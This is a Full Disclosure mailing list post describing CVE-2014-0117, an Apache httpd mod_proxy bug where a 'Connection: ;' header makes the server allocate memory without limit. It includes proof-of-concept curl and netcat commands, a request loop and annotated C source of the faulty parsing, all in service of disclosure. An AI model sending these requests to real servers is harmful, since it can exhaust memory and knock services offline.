Full Disclosure mailing list archives

By Date By Thread Apache HTTPd - description of the CVE-2014-0117. From: funky.koval () hushmail com

Date: Mon, 21 Jul 2014 16:47:49 +0000

Hi there, Software: apache httpd 2.4.7 , possibly others from 2.3 and 2.4 branches. If apache is configured with mod_proxy module (for example in front of a tomcat, or proxypassing requests to other backend servers), it is possible to use all available memory on the server and potentially cause an OOM condition that requires a reboot. In our tests, a single requests was causing apache to spin and keep allocating memory (gigabytes in seconds). A simple bash script that does this X time can speed the process up. Bug can be triggered in request or response. PoC (request): -- cut -- curl -H 'Connection: ;' http://127.0.0.1/ -- cut -- PoC (response): printf "HTTP/1.1 200 OKrnConnection: ;rnrn" | nc -l -p 80 Example config to replicate it, in httpd.conf : -- cut -- BalancerMember http://127.0.0.1:8100 ProxyPass / balancer://mycluster -- cut -- then listen on port 8100 : -- cut -- nc -l -p 8100 -- cut -- Then send a request with "Connection: ;" header and watch the memory usage. -- cut -- curl -H 'Connection: ;' http://127.0.0.1/ -- cut -- Single request will usually get killed with the following message: -- cut -- [crit] Memory allocation failed, aborting process. [core:notice] [pid 3205:tid 139786428621120] AH00051: child pid 4212 exit signal Aborted (6), possible coredump in -- cut -- hence it may be more visible on machines with huge ram by running more requests, ideally concurrently but this should do as well for demonstration purposes: -- cut -- for i in `seq 1 100` ; do curl -m 1 -H 'Connection: ;' http://127.0.0.1/ ; done -- cut -- Now where the problem is: incorrect parsing in find_conn_headers, it only moves the pointer when it encounters a comma, and calls ap_get_token which returns an empty string as it skips over ';'. // key == 'Connection' // val == ';' static int find_conn_headers(void *data, const char *key, const char *val) { header_connection *x = data; const char *name; do { while (*val == ',') { // jump over expected comma separator val++; } name = ap_get_token(x->pool, &val, 0); // returns empty string in our case if (!strcasecmp(name, "close")) { // not mached, branch not taken x->closed = 1; } if (!x->first) { // branch taken x->first = name; // "" as name is empty } else { // branch not taken due to above const char **elt; if (!x->array) { x->array = apr_array_make(x->pool, 4, sizeof(char *)); } elt = apr_array_push(x->array); *elt = name; } } while (*val); // val is still ';' return 1; } /* Retrieve a token, spacing over it and returning a pointer to * the first non-white byte afterwards. Note that these tokens * are delimited by semis and commas; and can also be delimited * by whitespace at the caller's option. */ AP_DECLARE(char *) ap_get_token(apr_pool_t *p, const char **accept_line, int accept_white) { const char *ptr = *accept_line; const char *tok_start; char *token; int tok_len; /* Find first non-white byte */ while (apr_isspace(*ptr)) ++ptr; tok_start = ptr; // ';' /* find token end, skipping over quoted strings. * (comments are already gone). */ while (*ptr && (accept_white || !apr_isspace(*ptr)) && *ptr != ';' && *ptr != ',') { // not satisfied as ';' if (*ptr++ == '"') // skips the if itself while (*ptr) if (*ptr++ == '"') break; } tok_len = ptr - tok_start; // 0 token = apr_pstrndup(p, tok_start, tok_len); // token = "" /* Advance accept_line pointer to the next non-white byte */ while (apr_isspace(*ptr)) // not a space ++ptr; *accept_line = ptr; return token; } We hope you enjoyed it. Regards, Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466 Attachment: cve-2014-0117.txt

Description: _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: Apache HTTPd - description of the CVE-2014-0117. funky . koval (Jul 22)